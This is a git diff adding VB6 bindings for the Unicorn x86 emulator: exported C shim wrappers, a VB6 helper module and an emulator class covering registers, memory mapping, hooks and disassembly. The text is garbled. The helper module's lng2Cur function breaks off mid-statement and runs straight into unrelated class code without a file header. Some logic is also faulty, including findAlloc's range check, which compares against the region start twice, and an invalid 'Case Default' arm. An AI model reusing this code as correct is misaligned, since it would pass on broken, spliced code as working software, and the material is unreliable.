ucs_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count){ +#pragma EXPORT + return uc_reg_write_batch(uc, regs, vals, count); +} + +uc_err __stdcall ucs_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count){ +#pragma EXPORT + return uc_reg_read_batch(uc, regs, vals, count); +} + +uc_err __stdcall ucs_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size){ +#pragma EXPORT + return uc_mem_write(uc, address, bytes, size); +} + +uc_err __stdcall ucs_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size){ +#pragma EXPORT + return uc_mem_read(uc, address, bytes, size); +} + +uc_err __stdcall ucs_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count){ +#pragma EXPORT + return uc_emu_start(uc, begin, until, timeout, count); +} + +uc_err __stdcall ucs_emu_stop(uc_engine *uc){ +#pragma EXPORT + return uc_emu_stop(uc); +} + +uc_err __stdcall ucs_hook_del(uc_engine *uc, uc_hook hh){ +#pragma EXPORT + return uc_hook_del(uc, hh); +} + +uc_err __stdcall ucs_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms){ +#pragma EXPORT + return uc_mem_map(uc, address, size, perms); +} + +//requires link against v1.0 +uc_err __stdcall ucs_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr){ +#pragma EXPORT + return uc_mem_map_ptr(uc, address, size, perms, ptr); +} + + +uc_err __stdcall ucs_mem_unmap(uc_engine *uc, uint64_t address, size_t size){ +#pragma EXPORT + return uc_mem_unmap(uc, address, size); +} + +uc_err __stdcall ucs_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms){ +#pragma EXPORT + return uc_mem_protect(uc, address, size, perms); +} + +uc_err __stdcall ucs_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count){ +#pragma EXPORT + return uc_mem_regions(uc, regions, count); +} + +uc_err __stdcall ucs_context_alloc(uc_engine *uc, uc_context **context){ +#pragma EXPORT + return uc_context_alloc(uc, 
context); +} + +uc_err __stdcall ucs_free(void *mem){ +#pragma EXPORT + return uc_free(mem); +} + +uc_err __stdcall ucs_context_save(uc_engine *uc, uc_context *context){ +#pragma EXPORT + return uc_context_save(uc, context); +} + +uc_err __stdcall ucs_context_restore(uc_engine *uc, uc_context *context){ +#pragma EXPORT + return uc_context_restore(uc, context); +} + +/* +char* asprintf(char* format, ...){ + + char *ret = 0; + + if(!format) return 0; + + va_list args; + va_start(args,format); + int size = _vscprintf(format, args); + + if(size > 0){ + size++; //for null + ret = (char*)malloc(size+2); + if(ret) _vsnprintf(ret, size, format, args); + } + + va_end(args); + return ret; +}*/ + +#ifdef INCLUDE_DISASM +int __stdcall disasm_addr(uc_engine *uc, uint32_t va, char *str, int bufLen){ +#pragma EXPORT + uint32_t instr_len = 0; + int readLen = 15; + uint8_t data[32]; + INSTRUCTION inst; + + if(bufLen < 100) return -1; + + //longest x86 instruction is 15 bytes, what if at the tail end of an allocation? try to read as much as we can.. + while(uc_mem_read(uc,va,data,readLen) != 0){ + readLen--; + if(readLen == 0) return -2; + } + + instr_len = get_instruction(&inst, data, MODE_32); + if( instr_len == 0 ) return -3; + + get_instruction_string(&inst, FORMAT_INTEL, va, str, bufLen); + + /* + if(inst.type == INSTRUCTION_TYPE_JMP || inst.type == INSTRUCTION_TYPE_JMPC){ + if(inst.op1.type == OPERAND_TYPE_IMMEDIATE){ + if(strlen(str) + 6 < bufLen){ + if(getJmpTarget(str) < va){ + strcat(str," ^^"); + }else{ + strcat(str," vv"); + } + } + } + }*/ + + return instr_len; +} +#endif + + +//maps and write in one shot, auto handles alignment.. +uc_err __stdcall mem_write_block(uc_engine *uc, uint64_t address, void* data, uint32_t size, uint32_t perm){ +#pragma EXPORT + + uc_err x; + uint64_t base = address; + uint32_t sz = size; + + while(base % 0x1000 !=0){ + base--; + if(base==0) break; + } + + sz += address-base; //if data starts mid block, we need to alloc more than just size.. 
+ while(sz % 0x1000 !=0){ + sz++; + } + + x = uc_mem_map(uc, base, sz, perm); + if(x) return x; + + x = uc_mem_write(uc, address, (void*)data, size); + if(x) return x; + return UC_ERR_OK; +} + +void addStr(_CollectionPtr p , char* str){ + _variant_t vv; + vv.SetString(str); + p->Add( &vv.GetVARIANT() ); +} + +uc_err __stdcall get_memMap(uc_engine *uc, _CollectionPtr *pColl){ +#pragma EXPORT + + uc_mem_region *regions; + uint32_t count; + char tmp[200]; //max 46 chars used + + uc_err err = uc_mem_regions(uc, ®ions, &count); + + if (err != UC_ERR_OK) return err; + + for (uint32_t i = 0; i < count; i++) { + sprintf(tmp,"&h%llx,&h%llx,&h%x", regions[i].begin, regions[i].end, regions[i].perms); + addStr(*pColl,tmp); + } + + //free(regions); //https://github.com/unicorn-engine/unicorn/pull/373#issuecomment-271187118 + + uc_free((void*)regions); + return err; + +} + +enum op{ + op_add = 0, + op_sub = 1, + op_div = 2, + op_mul = 3, + op_mod = 4, + op_xor = 5, + op_and = 6, + op_or = 7, + op_rsh = 8, + op_lsh = 9, + op_gt = 10, + op_lt = 11, + op_gteq = 12, + op_lteq = 13 +}; + +unsigned int __stdcall ULong(unsigned int v1, unsigned int v2, int operation){ +#pragma EXPORT + + switch(operation){ + case op_add: return v1 + v2; + case op_sub: return v1 - v2; + case op_div: return v1 / v2; + case op_mul: return v1 * v2; + case op_mod: return v1 % v2; + case op_xor: return v1 ^ v2; + case op_and: return v1 & v2; + case op_or: return v1 | v2; + case op_rsh: return v1 >> v2; + case op_lsh: return v1 << v2; + case op_gt: return (v1 > v2 ? 1 : 0); + case op_lt: return (v1 < v2 ? 1 : 0); + case op_gteq: return (v1 >= v2 ? 1 : 0); + case op_lteq: return (v1 <= v2 ? 
1 : 0);
    }

    return -1;

}
\ No newline at end of file
diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/misc.bas b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/misc.bas
new file mode 100644
index 0000000..255d9e8
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/misc.bas
Attribute VB_Name = "misc"
Option Explicit

Public sharedMemory() As Byte 'in a module so it never goes out of scope and becomes unallocated..

'Win32 imports used for manual dll loading and raw memory copies
Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Public Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long

'operation selector for the unsigned-math helper exported by ucvbshim.dll
'(values must stay in sync with the C enum of the same name)
Enum op
    op_add = 0
    op_sub = 1
    op_div = 2
    op_mul = 3
    op_mod = 4
    op_xor = 5
    op_and = 6
    op_or = 7
    op_rsh = 8
    op_lsh = 9
    op_gt = 10
    op_lt = 11
    op_gteq = 12
    op_lteq = 13
End Enum

'unsigned math operations
Public Declare Function ULong Lib "ucvbshim.dll" (ByVal v1 As Long, ByVal v2 As Long, ByVal operation As op) As Long

'this is just a quick way to support x64 numbers in vb6 its lite but can be bulky to work with
'if we wanted to really work with x64 values we would compile a library such as the following into the shim layer:
' https://github.com/dzzie/libs/tree/master/vb6_utypes

Private Type Bit64Currency
    value As Currency
End Type

Private Type Bit64Integer
    LowValue As Long
    HighValue As Long
End Type

Global Const LANG_US = &H409

'reinterprets a 32bit Long as a 64bit Currency (raw bit copy via LSet, no scaling applied)
Function lng2Cur(v As Long) As Currency
    Dim c As Bit64Currency
    Dim dl As Bit64Integer
    dl.LowValue = v
    dl.HighValue = 0
    LSet c = dl
    lng2Cur =
'
'you can find a full unsigned and x64 safe library for vb6 here:
' https://github.com/dzzie/libs/tree/master/vb6_utypes

Public hLib As Long         'module handle of ucvbshim.dll
Public uc As Long           'opaque uc_engine* returned by ucs_open
Public errMsg As String     'last error text; Empty when the last call succeeded
Public Version As String
Public major As Long
Public minor As Long

Private r32 As Variant      'lookup tables mapping the 0-based sub enums to real UC_X86_REG_* ids
Private r16 As Variant
Private r8 As Variant
Private rs_ As Variant
Private rs_Name As Variant
Private r32_Name As Variant
Private r16_Name As Variant
Private r8_Name As Variant
Private hooks As New Collection   'hook handles keyed by "flags:<n>" or "instr:<n>"
Private m_DisasmOk As Boolean     'True when the shim exports disasm_addr

Event CodeHook(ByVal address As Long, ByVal size As Long)
Event BlockHook(ByVal address As Long, ByVal size As Long)
Event MemAccess(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long)
Event InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long, ByRef continue As Boolean)
Event Interrupt(ByVal intno As Long)

'our vb enum is 0 based then mapped to the real C values so we can loop them to dump with name lookup
'these sub enums also keep the intellisense lists short and focused when reading/writing vals
'they are accessed through reg32, reg16, reg8, rs properties, or use raw full enum through reg property
'the names of each can be looked up through the reg32n etc properties
Public Enum reg_32
    eax_r = 0
    ecx_r = 1
    edx_r = 2
    ebx_r = 3
    esp_r = 4
    ebp_r = 5
    esi_r = 6
    edi_r = 7
End Enum

Public Enum reg_16
    ax_r = 0
    cx_r = 1
    dx_r = 2
    bx_r = 3
    sp_r = 4
    bp_r = 5
    si_r = 6
    di_r = 7
End Enum

Public Enum reg_8
    ah_r = 0
    ch_r = 1
    dh_r = 2
    bh_r = 3
    al_r = 4
    cl_r = 5
    dl_r = 6
    bl_r = 7
End Enum

Public Enum reg_Special
    CS_r = 0
    DS_r = 1
    ES_r = 2
    FS_r = 3
    GS_r = 4
    SS_r = 5
    IDTR_r = 6
    GDTR_r = 7
    LDTR_r = 8
End Enum

Property Get DisasmAvail() As Boolean
    DisasmAvail = m_DisasmOk
End Property

Property Get lastError() As Long
    lastError = ucs_errno(uc)
End Property

Property Get hadErr() As Boolean
    If Len(errMsg) > 0 Then hadErr = True
End Property

Property Get eip() As Long
    Dim e As uc_err, value As Long
    e = ucs_reg_read(uc, UC_X86_REG_EIP, value)
    eip = value
End Property

Property Let eip(v As Long)
    Dim e As uc_err
    e = ucs_reg_write(uc, UC_X86_REG_EIP, v)
End Property

Property Get eflags() As Long
    Dim e As uc_err, value As Long
    e = ucs_reg_read(uc, UC_X86_REG_EFLAGS, value)
    eflags = value
End Property

Property Let eflags(v As Long)
    Dim e As uc_err
    e = ucs_reg_write(uc, UC_X86_REG_EFLAGS, v)
End Property


'full access to all registers if you need it..
Property Get reg(r As uc_x86_reg) As Long
    Dim e As uc_err, value As Long
    e = ucs_reg_read(uc, r, value)
    reg = value
End Property

Property Let reg(r As uc_x86_reg, value As Long)
    Dim e As uc_err
    e = ucs_reg_write(uc, r, value)
End Property

'32 bit registers
Property Get reg32(r As reg_32) As Long
    Dim e As uc_err, value As Long
    If r < 0 Or r > UBound(r32) Then Exit Property
    e = ucs_reg_read(uc, r32(r), value)
    reg32 = value
End Property

Property Let reg32(r As reg_32, value As Long)
    Dim e As uc_err
    If r < 0 Or r > UBound(r32) Then Exit Property
    e = ucs_reg_write(uc, r32(r), value)
End Property

'16 bit registers
Property Get reg16(r As reg_16) As Long
    Dim e As uc_err, value As Long
    If r < 0 Or r > UBound(r16) Then Exit Property
    e = ucs_reg_read(uc, r16(r), value)
    reg16 = CInt(value)
End Property

Property Let reg16(r As reg_16, ByVal value As Long)
    Dim e As uc_err
    value = value And &HFFFF   'clamp to 16 bits before writing
    If r < 0 Or r > UBound(r16) Then Exit Property
    e = ucs_reg_write(uc, r16(r), value)
End Property

'8 bit registers
Property Get reg8(r As reg_8) As Long
    Dim e As uc_err, value As Long
    If r < 0 Or r > UBound(r8) Then Exit Property
    e = ucs_reg_read(uc, r8(r), value)
    reg8 = value
End Property

Property Let reg8(r As reg_8, ByVal value As Long)
    Dim e As uc_err
    value = value And &HFF     'clamp to 8 bits before writing
    If r < 0 Or r > UBound(r8) Then Exit Property
    e = ucs_reg_write(uc, r8(r), value)
End Property

'special registers
Property Get rs(r As reg_Special) As Long
    Dim e As uc_err, value As Long
    If r < 0 Or r > UBound(rs_) Then Exit Property
    e = ucs_reg_read(uc, rs_(r), value)
    rs = value
End Property

Property Let rs(r As reg_Special, ByVal value As Long)
    Dim e As uc_err
    If r < 0 Or r > UBound(rs_) Then Exit Property
    e = ucs_reg_write(uc, rs_(r), value)
End Property


'reg index to name translation for looping
Property Get reg32n(r As reg_32) As String
    If r < 0 Or r > UBound(r32_Name) Then Exit Property
    reg32n = r32_Name(r)
End Property

Property Get reg16n(r As reg_16) As String
    If r < 0 Or r > UBound(r16_Name) Then Exit Property
    reg16n = r16_Name(r)
End Property

Property Get reg8n(r As reg_8) As String
    If r < 0 Or r > UBound(r8_Name) Then Exit Property
    reg8n = r8_Name(r)
End Property

Property Get rsn(r As reg_Special) As String
    If r < 0 Or r > UBound(rs_Name) Then Exit Property
    rsn = rs_Name(r)
End Property

'one-line hex dump of the 32bit registers, optionally with eip and decoded eflags
Function regDump(Optional includeState As Boolean = True) As String
    Dim i As Long
    Dim tmp As String

    For i = 0 To UBound(r32)
        tmp = tmp & reg32n(i) & "=" & Hex(reg32(i)) & " "
        'if i mod 3 = 0 and i <> 0 then tmp = tmp & vbcrlf
    Next

    regDump = tmp

    If includeState Then
        regDump = regDump & "eip=" & Hex(Me.eip) & " " & dumpFlags()
    End If

End Function

'decodes eflags bit-by-bit into a readable string (0 entries mark reserved bits)
Function dumpFlags() As String

    Dim ret() As String
    Dim n As Variant
    Dim i As Long
    Dim flags As Long

    'http://www.c-jump.com/CIS77/ASM/Instructions/I77_0050_eflags.htm
    n = Array("C ", 0, "P ", 0, "A ", 0, "Z ", "S ", _
        "T ", "I ", "D ", "O ", "IOPL ", "IOPL ", "NT ", 0, _
        "RF ", "VM ", "AC ", "VIF ", "VIP ", "ID ", 0)

    flags = Me.eflags
    push ret, "EFL " & Hex(flags)

    For i = 0 To 21
        If flags And ULong(1, i, op_lsh) Then   'unsigned 1 << i via the shim helper
            If n(i) <> 0 Then push ret, n(i)
        End If
    Next

    dumpFlags = Join(ret, " ")


End Function

'locates/loads ucvbshim.dll, initializes the register lookup tables and opens a
'32bit x86 engine instance; on any failure errMsg is set and uc stays 0.
Private Sub Class_Initialize()

    Dim e As uc_err

    'mapping our simplified to real values..
    r32 = Array(UC_X86_REG_EAX, UC_X86_REG_ECX, UC_X86_REG_EDX, UC_X86_REG_EBX, UC_X86_REG_ESP, UC_X86_REG_EBP, UC_X86_REG_ESI, UC_X86_REG_EDI)
    r32_Name = Array("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

    r16 = Array(UC_X86_REG_AX, UC_X86_REG_CX, UC_X86_REG_DX, UC_X86_REG_BX, UC_X86_REG_SP, UC_X86_REG_BP, UC_X86_REG_SI, UC_X86_REG_DI)
    r16_Name = Array("ax", "cx", "dx", "bx", "sp", "bp", "si", "di")

    r8 = Array(UC_X86_REG_AH, UC_X86_REG_CH, UC_X86_REG_DH, UC_X86_REG_BH, UC_X86_REG_AL, UC_X86_REG_CL, UC_X86_REG_DL, UC_X86_REG_Bl)
    r8_Name = Array("ah", "ch", "dh", "bh", "al", "cl", "dl", "bl")

    rs_ = Array(UC_X86_REG_CS, UC_X86_REG_DS, UC_X86_REG_ES, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_SS, UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR)
    rs_Name = Array("cs", "ds", "es", "fs", "gs", "ss", "idtr", "gdtr", "ldtr")

    'just to ensure IDE finds the dll before we try to use it...
    Const dllName As String = "ucvbshim.dll"

    'NOTE(review): if UNICORN_PATH is a folder this rewrites it to point at
    'unicorn.dll inside that folder - confirm callers expect that mutation.
    If Len(UNICORN_PATH) = 0 Then
        UNICORN_PATH = vbNullString
    ElseIf FolderExists(UNICORN_PATH) Then
        UNICORN_PATH = UNICORN_PATH & IIf(Right(UNICORN_PATH, 1) = "\", "", "\") & "unicorn.dll"
    End If

    'try already-loaded module, then next to unicorn.dll, then the default search path
    If hLib = 0 Then
        hLib = GetModuleHandle(dllName)
        If hLib = 0 Then
            hLib = LoadLibrary(GetParentFolder(UNICORN_PATH) & "\" & dllName)
            If hLib = 0 Then
                hLib = LoadLibrary(dllName)
                If hLib = 0 Then
                    errMsg = "Could not load " & dllName
                    Exit Sub
                End If
            End If
        End If
    End If

    If DYNLOAD = 0 Then
        DYNLOAD = ucs_dynload(UNICORN_PATH)
        If DYNLOAD = 0 Then
            errMsg = "Dynamic Loading of unicorn.dll failed " & IIf(Len(UNICORN_PATH) > 0, "path: " & UNICORN_PATH, "")
            Exit Sub
        End If
    End If

    ucs_version major, minor
    Version = major & "." & minor

    If ucs_arch_supported(UC_ARCH_X86) <> 1 Then
        errMsg = "UC_ARCH_X86 not supported"
        Exit Sub
    End If

    e = ucs_open(UC_ARCH_X86, UC_MODE_32, uc)
    If e <> uc_err_ok Then
        errMsg = "Failed to create new x86 32bit engine instance " & err2str(e)
        Exit Sub
    End If

    If GetProcAddress(hLib, "disasm_addr") <> 0 Then m_DisasmOk = True

    instances.Add Me, "objptr:" & ObjPtr(Me)

End Sub

Private Sub Class_Terminate()
    If uc = 0 Then Exit Sub
    stopEmu
    ucs_close uc
    On Error Resume Next
    instances.Remove "objptr:" & ObjPtr(Me)
End Sub

'maps a block of emulator memory; returns False and sets errMsg on failure
Function mapMem(address As Long, size As Long, Optional protection As uc_prot = UC_PROT_ALL) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    errMsg = Empty
    addr = lng2Cur(address)

    e = ucs_mem_map(uc, addr, size, protection)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    mapMem = True

End Function

'address and size must be 4kb aligned, real buffer must be at least of size, and not go out of scope!
Function mapMemPtr(ByRef b() As Byte, address As Long, size As Long, Optional protection As uc_prot = UC_PROT_ALL) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    errMsg = Empty
    addr = lng2Cur(address)

    If UBound(b) < size Then
        errMsg = "Buffer is < size"
        Exit Function
    End If

    If size Mod &H1000 <> 0 Then
        errMsg = "Size must be 4kb aligned"
        Exit Function
    End If

    If address Mod &H1000 <> 0 Then
        errMsg = "address must be 4kb aligned"
        Exit Function
    End If

    e = ucs_mem_map_ptr(uc, addr, size, protection, VarPtr(b(0)))

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    mapMemPtr = True

End Function

'finds the mapped region starting at (or, with inRange, containing) address
Function findAlloc(address As Long, Optional inRange As Boolean = False) As CMemRegion
    Dim m As CMemRegion
    Dim found As Boolean

    For Each m In getMemMap()
        If inRange Then
            'unsigned compares via the shim helper
            If ULong(address, m.address, op_gteq) = 1 And ULong(address, m.address, op_lteq) = 1 Then found = True
        Else
            If m.address = address Then found = True
        End If
        If found Then
            Set findAlloc = m
            Exit Function
        End If
    Next
End Function

'we could accept a variant here instead of CMemRegion
'if typename(v) = "Long" then enum regions and find cmem, else expect CMemRegion..
'would be convient.. or a findAlloc(base as long) as CMemRegion
Function changePermissions(m As CMemRegion, newProt As uc_prot)
    Dim e As uc_err
    Dim addr64 As Currency

    errMsg = Empty

    If m Is Nothing Then Exit Function

    If newProt = m.perm Then
        changePermissions = True
        Exit Function
    End If

    addr64 = lng2Cur(m.address)

    e = ucs_mem_protect(uc, addr64, m.size, newProt)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    m.perm = newProt
    changePermissions = True

End Function


'unmaps the region whose base address equals base; False if not found or unmap fails
Function unMapMem(base As Long) As Boolean

    Dim m As CMemRegion
    Dim e As uc_err
    Dim addr64 As Currency

    errMsg = Empty
    addr64 = lng2Cur(base)

    For Each m In getMemMap()
        If m.address = base Then
            e = ucs_mem_unmap(uc, addr64, m.size)
            unMapMem = (e = uc_err_ok)
            If Not unMapMem Then errMsg = err2str(e)
            Exit Function
        End If
    Next

End Function

'this function maps and writes (note 32bit only right now)
Function writeBlock(address As Long, buf() As Byte, Optional perm As uc_prot = UC_PROT_ALL) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    addr = lng2Cur(address)

    errMsg = Empty
    e = mem_write_block(uc, addr, buf(0), UBound(buf) + 1, perm)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeBlock = True

End Function

'this function requires the memory already be mapped in, use writeBlock for easier access...
Function writeMem(address As Long, buf() As Byte) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    errMsg = Empty
    addr = lng2Cur(address)

    e = ucs_mem_write(uc, addr, buf(0), UBound(buf) + 1)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeMem = True

End Function

Function writeByte(address As Long, b As Byte) As Boolean

    Dim addr As Currency
    Dim e As uc_err
    Dim buf(0) As Byte

    errMsg = Empty
    addr = lng2Cur(address)
    buf(0) = b

    e = ucs_mem_write(uc, addr, buf(0), 1)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeByte = True

End Function

Function writeLong(address As Long, value As Long) As Boolean

    Dim addr As Currency
    Dim e As uc_err
    Dim buf(0 To 3) As Byte

    errMsg = Empty
    addr = lng2Cur(address)
    CopyMemory buf(0), ByVal VarPtr(value), 4

    e = ucs_mem_write(uc, addr, buf(0), 4)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeLong = True

End Function

Function writeInt(address As Long, value As Integer) As Boolean

    Dim addr As Currency
    Dim e As uc_err
    Dim buf(0 To 1) As Byte

    errMsg = Empty
    addr = lng2Cur(address)
    CopyMemory buf(0), ByVal VarPtr(value), 2

    e = ucs_mem_write(uc, addr, buf(0), 2)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    writeInt = True

End Function

'reads size bytes at address into buf (redimmed here); False and errMsg set on failure
Function readMem(address As Long, ByRef buf() As Byte, ByVal size As Long) As Boolean

    Dim addr As Currency
    Dim e As uc_err

    errMsg = Empty
    addr = lng2Cur(address)
    ReDim buf(size - 1) '0 based..

    e = ucs_mem_read(uc, addr, buf(0), UBound(buf) + 1)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    readMem = True

End Function

Function readByte(address As Long, ByRef b As Byte) As Boolean

    Dim buf() As Byte

    readMem address, buf, 1
    If hadErr Then Exit Function

    b = buf(0)
    readByte = True

End Function

Function readLong(address As Long, ByRef retVal As Long) As Boolean

    Dim buf() As Byte

    readMem address, buf, 4
    If hadErr Then Exit Function

    CopyMemory ByVal VarPtr(retVal), buf(0), 4
    readLong = True

End Function

Function readInt(address As Long, ByRef retVal As Integer) As Boolean

    Dim buf() As Byte

    readMem address, buf, 2
    If hadErr Then Exit Function

    CopyMemory ByVal VarPtr(retVal), buf(0), 2
    readInt = True

End Function


'allocates and saves a cpu context snapshot; returns the context handle, 0 on failure
Function saveContext() As Long

    Dim hContext As Long
    Dim e As uc_err

    errMsg = Empty
    e = ucs_context_alloc(uc, hContext)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    e = ucs_context_save(uc, hContext)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        e = ucs_free(hContext)   'don't leak the allocation if the save failed
        If e <> uc_err_ok Then errMsg = errMsg & " error freeing context: " & err2str(e)
        Exit Function
    End If

    saveContext = hContext

End Function

Function restoreContext(hContext As Long) As Boolean

    Dim e As uc_err

    errMsg = Empty
    e = ucs_context_restore(uc, hContext)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    restoreContext = True

End Function

Function freeContext(hContext As Long) As Boolean
    Dim e As uc_err
    e = ucs_free(hContext)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
    Else
        freeContext = True
    End If
End Function


'disassembles one instruction at va, returning "address bytes mnemonics";
'instrLen receives the instruction length (or the negative shim error code)
Function disasm(va As Long, Optional ByRef instrLen As Long) As String

    Dim buf As String, i As Long, b() As Byte
    Dim dump As String
    On Error Resume Next

    If Not m_DisasmOk Then
        disasm = Right("00000000" & Hex(va), 8)
        Exit Function
    End If

    buf = String(300, Chr(0))

    instrLen = disasm_addr(uc, va, buf, Len(buf))
    If instrLen < 1 Then
        Select Case instrLen
            Case -1: buf = "Buffer to small"
            Case -2: buf = "Failed to read memory"
            Case -3: buf = "Failed to disassemble"
            'NOTE(review): VB6 has no "Case Default" - the fallback arm should be
            '"Case Else"; as written "Default" is an undeclared identifier - confirm.
            Case Default: buf = "Unknown error " & instrLen
        End Select
        dump = "?? ?? ??"
        GoTo end_of_func
    End If

    i = InStr(buf, Chr(0))
    If i > 2 Then buf = VBA.Left(buf, i - 1) Else buf = Empty

    readMem va, b(), instrLen

    For i = 0 To UBound(b)
        dump = dump & hhex(b(i)) & " "
    Next

end_of_func:
    disasm = Right("00000000" & Hex(va), 8) & " " & rpad(dump, 25) & buf

End Function

'runs the emulator from beginAt until endAt (timeout/count optional limits)
Function startEmu(beginAt As Long, endAt As Long, Optional timeout As Long = 0, Optional count As Long = 0) As Boolean

    Dim e As uc_err
    Dim a As Currency, b As Currency, t As Currency

    a = lng2Cur(beginAt)
    b = lng2Cur(endAt)
    t = lng2Cur(timeout)

    errMsg = Empty
    e = ucs_emu_start(uc, a, b, t, count)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    startEmu = True

End Function

Function stopEmu() As Boolean
    Dim e As uc_err
    errMsg = Empty
    e = ucs_emu_stop(uc)
    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If
    stopEmu = True
End Function


'registers a hook of the given catagory; duplicate registrations for the same
'flags are treated as success. The module-level *_hook stubs route back into
'this instance via ObjPtr.
Function addHook(catagory As hookCatagory, flags As uc_hook_type, Optional beginAt As Long = 1, Optional endAt As Long = 0) As Boolean

    Dim e As uc_err
    Dim hHook As Long 'handle to remove hook
    Dim a As Currency, b As Currency

    e = -1
    a = lng2Cur(beginAt)
    b = lng2Cur(endAt)
    errMsg = Empty

    If KeyExistsInCollection(hooks, "flags:" & flags) Then
        addHook = True
        Exit Function
    End If

    If catagory = hc_code Then e = ucs_hook_add(uc, hHook, flags, AddressOf code_hook, ObjPtr(Me), a, b, catagory)
    If catagory = hc_mem Then e = ucs_hook_add(uc, hHook, flags, AddressOf mem_hook, ObjPtr(Me), a, b, catagory)
    If catagory = hc_memInvalid Then e = ucs_hook_add(uc, hHook, flags, AddressOf invalid_mem_hook, ObjPtr(Me), a, b, catagory)
    If catagory = hc_block Then e = ucs_hook_add(uc, hHook, flags, AddressOf block_hook, ObjPtr(Me), a, b, catagory)
    If catagory = hc_int Then e = ucs_hook_add(uc, hHook, flags, AddressOf interrupt_hook, ObjPtr(Me), a, b, catagory)

    If e = -1 Then
        errMsg = "Unimplemented hook catagory"
        Exit Function
    End If

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    hooks.Add hHook, "flags:" & flags
    addHook = True

End Function

'actually these appear to use different prototypes for each instruction? (only in/out examples seen...)
'what about all the others? not implemented yet in c or vb callback
'Function hookInstruction(i As uc_x86_insn, Optional beginAt As Long = 1, Optional endAt As Long = 0) As Boolean
'
'    Dim e As uc_err
'    Dim hHook As Long 'handle to remove hook
'    Dim a As Currency, b As Currency
'
'    If i = UC_X86_INS_INVALID Then Exit Function
'
'    e = -1
'    a = lng2Cur(beginAt)
'    b = lng2Cur(endAt)
'    errMsg = Empty
'
'    If KeyExistsInCollection(hooks, "instr:" & i) Then
'        hookInstruction = True
'        Exit Function
'    End If
'
'    e = ucs_hook_add(uc, hHook, UC_HOOK_INSN, AddressOf instruction_hook, ObjPtr(Me), a, b, hc_inst, i)
'
'    If e <> UC_ERR_OK Then
'        errMsg = err2str(e)
'        Exit Function
'    End If
'
'    hooks.Add hHook, "instr:" & i
'    hookInstruction = True
'
'End Function


'removes a previously added hook by its flags (or instruction id) key
Function removeHook(ByVal flags As uc_hook_type) As Boolean

    On Error Resume Next

    Dim hHook As Long, e As uc_err, wasInstr As Boolean

    errMsg = Empty
    hHook = hooks("flags:" & flags)

    If hHook = 0 Then
        hHook = hooks("instr:" & flags) 'maybe it was an instruction hook?
        If hHook = 0 Then
            errMsg = "Hook handle not found for supplied flags."
            Exit Function
        Else
            wasInstr = True
        End If
    End If

    e = ucs_hook_del(uc, hHook)

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    If wasInstr Then
        hooks.Remove "instr:" & flags
    Else
        hooks.Remove "flags:" & flags
    End If

    removeHook = True

End Function

Function getMemMap() As Collection 'of 32bit CMemRegion
    Dim c As New Collection
    Dim ret As New Collection
    Dim mem As CMemRegion
    Dim e As uc_err
    Dim s, tmp, v

    errMsg = Empty
    Set getMemMap = ret

    e = get_memMap(uc, c)   'shim fills c with "&hbegin,&hend,&hperms" strings

    If e <> uc_err_ok Then
        errMsg = err2str(e)
        Exit Function
    End If

    For Each s In c '&h1000000,&h11fffff,&h7 these should always be 32bit safe values created in this class..
        If Len(s) > 0 Then
            tmp = Split(s, ",")
            If UBound(tmp) = 2 Then
                Set mem = New CMemRegion
                mem.address = CLng(tmp(0))
                mem.endsAt = CLng(tmp(1))
                mem.size = ULong(mem.endsAt, mem.address, op_sub) + 1 'vb native math is signed only..we play it safe..
                mem.perm = CLng(tmp(2))
                ret.Add mem
            End If
        End If
    Next

End Function


'these are internal functions used from the callback in the module to route the message to the event interface
'little confusing but in the end easier for the end user...also lays foundation for multiple live instances
'(although only one can run at a time since vb is single threaded)

